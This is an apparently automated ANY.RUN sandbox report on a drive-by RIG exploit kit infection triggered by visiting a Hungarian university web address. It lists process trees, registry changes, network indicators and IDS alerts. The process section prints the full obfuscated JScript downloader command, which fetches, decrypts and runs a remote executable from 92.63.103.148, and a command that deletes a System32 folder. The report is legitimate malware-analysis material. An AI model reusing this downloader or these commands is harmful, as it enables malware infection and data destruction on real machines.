URL:

http://mobi.unideb.hu/

Full analysis: https://app.any.run/tasks/77f37497-f84f-4417-840e-4823520f6e47
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 08:59:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
trojan
RigEK
Indicators:
MD5:

5107C3F03B4F64D0AD7F125F6788115D

SHA1:

A99248A7C3CB9865D587B4E749BCD8906B65A9DA

SHA256:

602692DDE37EF13CF6387683210976C4F2BC987C181A99EAFB5467316A39DF66

SSDEEP:

3:N1KT0MK:CAMK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to CnC server

      • iexplore.exe (PID: 3408)

    • Starts CMD.EXE for commands execution

      • iexplore.exe (PID: 3408)

    • Loads dropped or rewritten executable

      • iexplore.exe (PID: 3408)

    • Application was dropped or rewritten from another process

      • 6w03si33.exe (PID: 3172)
      • 6w03si33.exe (PID: 3168)

  • SUSPICIOUS

    • Executed via COM

      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)

    • Executable content was dropped or overwritten

      • iexplore.exe (PID: 3408)
      • 6w03si33.exe (PID: 3168)

    • Executes scripts

      • CMd.exe (PID: 3540)

    • Uses WMIC.EXE to create a new process

      • 6w03si33.exe (PID: 3172)

    • Executed via WMI

      • 6w03si33.exe (PID: 3168)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2892)

    • Changes internet zones settings

      • iexplore.exe (PID: 2892)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 3408)
      • iexplore.exe (PID: 2892)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2892)
      • iexplore.exe (PID: 3408)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3408)

    • Creates files in the user directory

      • iexplore.exe (PID: 2892)
      • iexplore.exe (PID: 3408)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)

    • Changes settings of System certificates

      • iexplore.exe (PID: 2892)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2892)

    • Application was crashed

      • iexplore.exe (PID: 3408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
9
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs cmd.exe no specs 6w03si33.exe no specs cmd.exe no specs wscript.exe wmic.exe 6w03si33.exe

Process information

PID
CMD
Path
Indicators
Parent process
2572"C:\Windows\System32\wbem\WMIC.exe" process call create "C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe"C:\Windows\System32\wbem\WMIC.exe
6w03si33.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2580cmd.exe /c start %SysFilename% & rd /s /q System32C:\Windows\system32\cmd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2732wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?NTY4MTYx&WpSxKsNbrnbYHNX&uNhJcKwrkGncbX=professional&tpEwClRnooCM=blackmail&jVSvKKuFvH=heartfelt&UvUAuzqqZAaG=strategy&DeNPAe=criticized&hAOhSmZgoCctj=wrapped&zwcDvCHYG=strategy&HwbNDR=golfer&ffhd3s=wnjQMvXcJRXQFYbHKuXDSKJDKU7WFEaVw4-QhMG3YpbNfynz2ezURnL7tASVVFuRrbMdK7ED&t4gdfgf4=PAbpjEGCKAwzn4sJVF0Q9vqo2heHzh_J0ZKD9BfeYllMq5DHF7kL21j0x7MWdc0v90vC6mdg&syRobD=difference&wHslOSZVKmURBxT=already&XdmGuLdxpy=constitution&PVzkJHTLspcC=difference&iXfcEzsj=difference&FXnstQAvT=difference&CicdukbAnF=difference&CzWHFyZeuMTMwODUy" "¤"C:\Windows\system32\wscript.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2892"C:\Program Files\Internet Explorer\iexplore.exe" "http://mobi.unideb.hu/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3152C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -EmbeddingC:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exesvchost.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe® Flash® Player Installer/Uninstaller 26.0 r0
Exit code:
0
Version:
26,0,0,131
Modules
Images
c:\windows\system32\macromed\flash\flashutil32_26_0_0_131_activex.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
3168C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exeC:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe
wmiprvse.exe
User:
admin
Company:
© pdfforge GmbH.
Integrity Level:
HIGH
Description:
L2tp Explores Was Xinclude Mentality
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\low\6w03si33.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3172C:\Users\admin\AppData\Local\Temp\Low\6w03si33.exe C:\Users\admin\AppData\Local\Temp\Low\6w03si33.execmd.exe
User:
admin
Company:
© pdfforge GmbH.
Integrity Level:
LOW
Description:
L2tp Explores Was Xinclude Mentality
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\low\6w03si33.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3408"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2892 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3540CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this["WScript"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DAAADDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?NTY4MTYx&WpSxKsNbrnbYHNX&uNhJcKwrkGncbX=professional&tpEwClRnooCM=blackmail&jVSvKKuFvH=heartfelt&UvUAuzqqZAaG=strategy&DeNPAe=criticized&hAOhSmZgoCctj=wrapped&zwcDvCHYG=strategy&HwbNDR=golfer&ffhd3s=wnjQMvXcJRXQFYbHKuXDSKJDKU7WFEaVw4-QhMG3YpbNfynz2ezURnL7tASVVFuRrbMdK7ED&t4gdfgf4=PAbpjEGCKAwzn4sJVF0Q9vqo2heHzh_J0ZKD9BfeYllMq5DHF7kL21j0x7MWdc0v90vC6mdg&syRobD=difference&wHslOSZVKmURBxT=already&XdmGuLdxpy=constitution&PVzkJHTLspcC=difference&iXfcEzsj=difference&FXnstQAvT=difference&CicdukbAnF=difference&CzWHFyZeuMTMwODUy" "¤"C:\Windows\system32\CMd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
765
Read events
682
Write events
80
Delete events
3

Modification events

(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{C22D46FF-DABB-11E9-B86F-5254004A04AF}
Value:
0
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
2
(PID) Process:(2892) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E30709000400130008003B0011000602
Executable files
3
Suspicious files
0
Text files
60
Unknown types
35

Dropped files

PID
Process
Filename
Type
2892iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
2892iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BQSOCX87\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DOXU0BID\css_xGpmgPjQGTMovJSAZ8ngTtkyWe6262r5x1GrxM3BGe4[1].csstext
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BQSOCX87\css_3JJWhei6qIBY7mE52MR51vwz8iCPhi-f2Xxg0jzu0EI[1].csstext
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FCR4HL4M\css_0hDeYAtWJzriYUQotMqMBIhcwbCWrX66XRbSzQ75D0s[1].csstext
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DOXU0BID\js_poZlFOAITdB9jcwZ034UU9Vu9QhgvOx4jMaa9aAshlo[1].jshtml
MD5:
SHA256:
3408iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BQSOCX87\js_6Tv_HHzDISftO0tOK8iXweCne-54OX61ritjgb4XROo[1].jstext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
56
TCP/UDP connections
39
DNS requests
14
Threats
15

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_0hDeYAtWJzriYUQotMqMBIhcwbCWrX66XRbSzQ75D0s.css
HU
text
27.3 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/
HU
html
68.3 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_qnkaz5lf6hQOtUS2mHJOZJ2JYUSCKswGu5ms66ZYDuU.css
HU
text
6.84 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_xGpmgPjQGTMovJSAZ8ngTtkyWe6262r5x1GrxM3BGe4.css
HU
text
2.55 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_3JJWhei6qIBY7mE52MR51vwz8iCPhi-f2Xxg0jzu0EI.css
HU
text
1.55 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/js/js_poZlFOAITdB9jcwZ034UU9Vu9QhgvOx4jMaa9aAshlo.js
HU
html
16.2 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/js/js_6Tv_HHzDISftO0tOK8iXweCne-54OX61ritjgb4XROo.js
HU
text
12.9 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/js/js_kfUVo9862BFyaL94dX_i46wDZFv1h_awoYX4A5_zgL4.js
HU
text
257 b
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_bDH-M1WFzQ_XY80yCN6ggc0AIKgYup5nANbkXsMDw-g.css
HU
text
2.65 Kb
unknown
3408
iexplore.exe
GET
200
193.6.138.68:80
http://mobi.unideb.hu/sites/default/files/css/css_xE-rWrJf-fncB6ztZfd2huxqgxu4WO-qwma6Xer30m4.css
HU
text
2.17 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3408
iexplore.exe
193.6.138.68:80
mobi.unideb.hu
NIIFI (Nemzeti Informacios Infrastruktura Fejlesztesi Iroda)
HU
unknown
2892
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3408
iexplore.exe
172.217.21.234:80
fonts.googleapis.com
Google Inc.
US
whitelisted
3408
iexplore.exe
172.217.18.99:80
fonts.gstatic.com
Google Inc.
US
whitelisted
3408
iexplore.exe
172.217.16.174:443
www.google-analytics.com
Google Inc.
US
whitelisted
3408
iexplore.exe
209.126.103.59:80
upgraderservices.cf
server4you Inc.
US
malicious
3408
iexplore.exe
74.125.71.157:443
stats.g.doubleclick.net
Google Inc.
US
whitelisted
2892
iexplore.exe
193.6.138.68:80
mobi.unideb.hu
NIIFI (Nemzeti Informacios Infrastruktura Fejlesztesi Iroda)
HU
unknown
3408
iexplore.exe
209.126.127.231:443
sslgateways.com
server4you Inc.
US
malicious
2892
iexplore.exe
209.126.127.231:443
sslgateways.com
server4you Inc.
US
malicious

DNS requests

Domain
IP
Reputation
mobi.unideb.hu
  • 193.6.138.68
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
code.jquery.com
  • 205.185.208.52
whitelisted
fonts.googleapis.com
  • 172.217.21.234
whitelisted
fonts.gstatic.com
  • 172.217.18.99
whitelisted
www.google-analytics.com
  • 172.217.16.174
whitelisted
upgraderservices.cf
  • 209.126.103.59
  • 209.126.103.139
malicious
hashtag.connectioncdn.com
  • 209.126.103.59
malicious
stats.g.doubleclick.net
  • 74.125.71.157
  • 74.125.71.156
  • 74.125.71.154
  • 74.125.71.155
whitelisted
sslgateways.com
  • 209.126.127.231
  • 209.126.103.139
malicious

Threats

PID
Process
Class
Message
1060
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .cf Domain
3408
iexplore.exe
Misc activity
ADWARE [PTsecurity] Redirecting.Zemot (RBN ZeroPark 0-Click)
1060
svchost.exe
Potentially Bad Traffic
ET INFO Observed DNS Query to .world TLD
3408
iexplore.exe
Potentially Bad Traffic
ET INFO HTTP Request to Suspicious *.world Domain
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B642
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS SunDown EK RIP Landing M1 B643
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
3408
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Outdated Flash Version M1
3408
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
2732
wscript.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
http://mobi.unideb.hu/